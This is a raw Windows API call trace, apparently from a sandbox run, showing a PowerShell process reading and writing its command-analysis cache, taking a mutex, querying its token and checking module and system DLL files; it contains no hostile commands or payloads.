	[0050.650] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0050.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d2e0) returned 1
	[0050.650] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18d3c0 | out: lpFileInformation=0x184c18d3c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0050.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d2a0) returned 1
	[0050.650] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733", nBufferLength=0x105, lpBuffer=0x184c18cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733", lpFilePart=0x0) returned 0x8f
	[0050.650] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d220) returned 1
	[0050.650] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_96fb2ebe-5768-403c-8fbc-1b0ef0323733"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6c8
	[0050.650] GetFileType (hFile=0x6c8) returned 0x1
	[0050.650] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d190) returned 1
	[0050.650] GetFileType (hFile=0x6c8) returned 0x1
	[0050.650] SetEndOfFile (hFile=0x6c8) returned 1
	[0050.651] WriteFile (in: hFile=0x6c8, lpBuffer=0x150474219b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18cc18, lpOverlapped=0x0 | out: lpBuffer=0x150474219b8*, lpNumberOfBytesWritten=0x184c18cc18*=0x1000, lpOverlapped=0x0) returned 1
	[0050.653] WriteFile (in: hFile=0x6c8, lpBuffer=0x150474219b8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18cc18, lpOverlapped=0x0 | out: lpBuffer=0x150474219b8*, lpNumberOfBytesWritten=0x184c18cc18*=0x1000, lpOverlapped=0x0) returned 1
	[0050.653] WriteFile (in: hFile=0x6c8, lpBuffer=0x150474219b8*, nNumberOfBytesToWrite=0xb07, lpNumberOfBytesWritten=0x184c18d338, lpOverlapped=0x0 | out: lpBuffer=0x150474219b8*, lpNumberOfBytesWritten=0x184c18d338*=0xb07, lpOverlapped=0x0) returned 1
	[0050.654] CloseHandle (hObject=0x6c8) returned 1
	[0050.655] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbbf0c0
	[0050.655] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbbf0c0 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0050.655] CoTaskMemFree (pv=0x1505fbbf0c0) 
	[0050.655] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18cca0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0050.655] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0050.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d280) returned 1
	[0050.655] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18d360 | out: lpFileInformation=0x184c18d360*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0050.655] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d240) returned 1
	[0050.655] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18cce0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0050.655] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d1c0) returned 1
	[0050.655] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6c8
	[0050.656] GetFileType (hFile=0x6c8) returned 0x1
	[0050.656] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d130) returned 1
	[0050.656] GetFileType (hFile=0x6c8) returned 0x1
	[0050.656] SetEndOfFile (hFile=0x6c8) returned 1
	[0050.656] WriteFile (in: hFile=0x6c8, lpBuffer=0x15047426a40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18cb98, lpOverlapped=0x0 | out: lpBuffer=0x15047426a40*, lpNumberOfBytesWritten=0x184c18cb98*=0x1000, lpOverlapped=0x0) returned 1
	[0050.657] WriteFile (in: hFile=0x6c8, lpBuffer=0x15047426a40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18c9d8, lpOverlapped=0x0 | out: lpBuffer=0x15047426a40*, lpNumberOfBytesWritten=0x184c18c9d8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.657] WriteFile (in: hFile=0x6c8, lpBuffer=0x15047426a40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18cb98, lpOverlapped=0x0 | out: lpBuffer=0x15047426a40*, lpNumberOfBytesWritten=0x184c18cb98*=0x1000, lpOverlapped=0x0) returned 1
	[0050.658] WriteFile (in: hFile=0x6c8, lpBuffer=0x15047426a40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x184c18c9d8, lpOverlapped=0x0 | out: lpBuffer=0x15047426a40*, lpNumberOfBytesWritten=0x184c18c9d8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.658] WriteFile (in: hFile=0x6c8, lpBuffer=0x15047426a40*, nNumberOfBytesToWrite=0xdda, lpNumberOfBytesWritten=0x184c18d2d8, lpOverlapped=0x0 | out: lpBuffer=0x15047426a40*, lpNumberOfBytesWritten=0x184c18d2d8*=0xdda, lpOverlapped=0x0) returned 1
	[0050.658] CloseHandle (hObject=0x6c8) returned 1
	[0050.659] ReleaseMutex (hMutex=0x6d8) returned 1
	[0050.801] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18da20*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18da20*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x17, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0050.802] SetEvent (hEvent=0x6ac) returned 1
	[0050.802] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18dbe0*=0x6ac, lpdwindex=0x184c18d9b4 | out: lpdwindex=0x184c18d9b4) returned 0x0
	[0050.803] GetCurrentProcess () returned 0xffffffffffffffff
	[0050.804] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18de68 | out: TokenHandle=0x184c18de68*=0x6c8) returned 1
	[0050.804] GetTokenInformation (in: TokenHandle=0x6c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18df68 | out: TokenInformation=0x0, ReturnLength=0x184c18df68) returned 0
	[0050.804] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505f48e500
	[0050.804] GetTokenInformation (in: TokenHandle=0x6c8, TokenInformationClass=0x1, TokenInformation=0x1505f48e500, TokenInformationLength=0x2c, ReturnLength=0x184c18df68 | out: TokenInformation=0x1505f48e500, ReturnLength=0x184c18df68) returned 1
	[0050.804] LocalFree (hMem=0x1505f48e500) returned 0x0
	[0050.804] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x1504743aed0, cbSid=0x184c18df60 | out: pSid=0x1504743aed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18df60) returned 1
	[0050.804] CreateMutexW (lpMutexAttributes=0x1504743b020, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x6b4
	[0050.804] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18de00*=0x6b4, lpdwindex=0x184c18dbd4 | out: lpdwindex=0x184c18dbd4) returned 0x0
	[0050.804] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0050.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd80) returned 1
	[0050.804] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18de60 | out: lpFileInformation=0x184c18de60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0050.804] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dd40) returned 1
	[0050.804] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0050.804] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dcc0) returned 1
	[0050.805] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6d0
	[0050.805] GetFileType (hFile=0x6d0) returned 0x1
	[0050.805] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dc30) returned 1
	[0050.805] GetFileType (hFile=0x6d0) returned 0x1
	[0050.805] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504743c0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18db28, lpOverlapped=0x0 | out: lpBuffer=0x1504743c0a8*, lpNumberOfBytesRead=0x184c18db28*=0x1000, lpOverlapped=0x0) returned 1
	[0050.807] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504743de1c, nNumberOfBytesToRead=0x2b, lpNumberOfBytesRead=0x184c18d758, lpOverlapped=0x0 | out: lpBuffer=0x1504743de1c*, lpNumberOfBytesRead=0x184c18d758*=0x2b, lpOverlapped=0x0) returned 1
	[0050.807] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504743c0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d7f8, lpOverlapped=0x0 | out: lpBuffer=0x1504743c0a8*, lpNumberOfBytesRead=0x184c18d7f8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.808] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504743de54, nNumberOfBytesToRead=0x9, lpNumberOfBytesRead=0x184c18d5a8, lpOverlapped=0x0 | out: lpBuffer=0x1504743de54*, lpNumberOfBytesRead=0x184c18d5a8*=0x9, lpOverlapped=0x0) returned 1
	[0050.808] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504743c0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d648, lpOverlapped=0x0 | out: lpBuffer=0x1504743c0a8*, lpNumberOfBytesRead=0x184c18d648*=0x1000, lpOverlapped=0x0) returned 1
	[0050.808] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504743de8c, nNumberOfBytesToRead=0xb, lpNumberOfBytesRead=0x184c18d798, lpOverlapped=0x0 | out: lpBuffer=0x1504743de8c*, lpNumberOfBytesRead=0x184c18d798*=0xb, lpOverlapped=0x0) returned 1
	[0050.808] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504743c0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d798, lpOverlapped=0x0 | out: lpBuffer=0x1504743c0a8*, lpNumberOfBytesRead=0x184c18d798*=0x1000, lpOverlapped=0x0) returned 1
	[0050.809] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504743c0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d6a8, lpOverlapped=0x0 | out: lpBuffer=0x1504743c0a8*, lpNumberOfBytesRead=0x184c18d6a8*=0xd9b, lpOverlapped=0x0) returned 1
	[0050.809] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504743c0a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18daf8, lpOverlapped=0x0 | out: lpBuffer=0x1504743c0a8*, lpNumberOfBytesRead=0x184c18daf8*=0x0, lpOverlapped=0x0) returned 1
	[0050.809] CloseHandle (hObject=0x6d0) returned 1
	[0050.809] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18dad0, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0050.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df50) returned 1
	[0050.809] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x15047449230 | out: lpFileInformation=0x15047449230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1
	[0050.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df10) returned 1
	[0050.809] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18da00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0050.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18de40) returned 1
	[0050.809] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18df20 | out: lpFileInformation=0x184c18df20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0050.809] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18de00) returned 1
	[0050.809] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733", nBufferLength=0x105, lpBuffer=0x184c18d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733", lpFilePart=0x0) returned 0x8f
	[0050.809] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18dd80) returned 1
	[0050.809] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_96fb2ebe-5768-403c-8fbc-1b0ef0323733" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_96fb2ebe-5768-403c-8fbc-1b0ef0323733"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6d0
	[0050.810] GetFileType (hFile=0x6d0) returned 0x1
	[0050.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dcf0) returned 1
	[0050.810] GetFileType (hFile=0x6d0) returned 0x1
	[0050.810] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504744a4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbe8, lpOverlapped=0x0 | out: lpBuffer=0x1504744a4f0*, lpNumberOfBytesRead=0x184c18dbe8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.989] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504744a4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d8b8, lpOverlapped=0x0 | out: lpBuffer=0x1504744a4f0*, lpNumberOfBytesRead=0x184c18d8b8*=0x1000, lpOverlapped=0x0) returned 1
	[0050.990] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504745eead, nNumberOfBytesToRead=0x5, lpNumberOfBytesRead=0x184c18d518, lpOverlapped=0x0 | out: lpBuffer=0x1504745eead*, lpNumberOfBytesRead=0x184c18d518*=0x5, lpOverlapped=0x0) returned 1
	[0050.990] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504744a4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18d518, lpOverlapped=0x0 | out: lpBuffer=0x1504744a4f0*, lpNumberOfBytesRead=0x184c18d518*=0xb02, lpOverlapped=0x0) returned 1
	[0050.991] ReadFile (in: hFile=0x6d0, lpBuffer=0x1504744a4f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18dbb8, lpOverlapped=0x0 | out: lpBuffer=0x1504744a4f0*, lpNumberOfBytesRead=0x184c18dbb8*=0x0, lpOverlapped=0x0) returned 1
	[0050.991] CloseHandle (hObject=0x6d0) returned 1
	[0051.018] ReleaseMutex (hMutex=0x6b4) returned 1
	[0051.019] CoCreateGuid (in: pguid=0x184c18e018 | out: pguid=0x184c18e018*(Data1=0xafdbfc56, Data2=0x8139, Data3=0x4cde, Data4=([0]=0xaa, [1]=0x1a, [2]=0x5c, [3]=0x13, [4]=0x80, [5]=0x50, [6]=0x8a, [7]=0x82))) returned 0x0
	[0051.019] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x6d0
	[0051.019] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6d4
	[0051.019] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c4
	[0051.019] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6dc
	[0051.020] SetEvent (hEvent=0x6dc) returned 1
	[0051.020] SetEvent (hEvent=0x6d0) returned 1
	[0051.020] SetEvent (hEvent=0x6d4) returned 1
	[0051.020] SetEvent (hEvent=0x6c4) returned 1
	[0051.020] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6b8
	[0051.020] SetThreadUILanguage (LangId=0x0) returned 0x409
	[0051.038] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x184c18db78*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18db78*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x1f, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.038] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x184c18da80*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x184c18da80*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x17, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.038] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x184c18db58*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x1f, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1)) | out: ActivityId=0x184c18db58*(Data1=0x12aaef56, Data2=0x6178, Data3=0x0, Data4=([0]=0x1f, [1]=0xf8, [2]=0xaa, [3]=0x12, [4]=0x78, [5]=0x61, [6]=0xd4, [7]=0x1))) returned 0x0
	[0051.099] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20
	[0051.100] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18d2c0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d700) returned 1
	[0051.100] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x184c18d7e0 | out: lpFileInformation=0x184c18d7e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1
	[0051.100] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18d6c0) returned 1
	[0051.100] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20
	[0051.100] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x184c18ce20, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71
	[0051.100] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbc14e0
	[0051.100] GetSystemDirectoryW (in: lpBuffer=0x1505fbc14e0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0051.100] CoTaskMemFree (pv=0x1505fbc14e0) 
	[0051.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0051.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x184c18ccf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c
	[0051.100] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18d130) returned 1
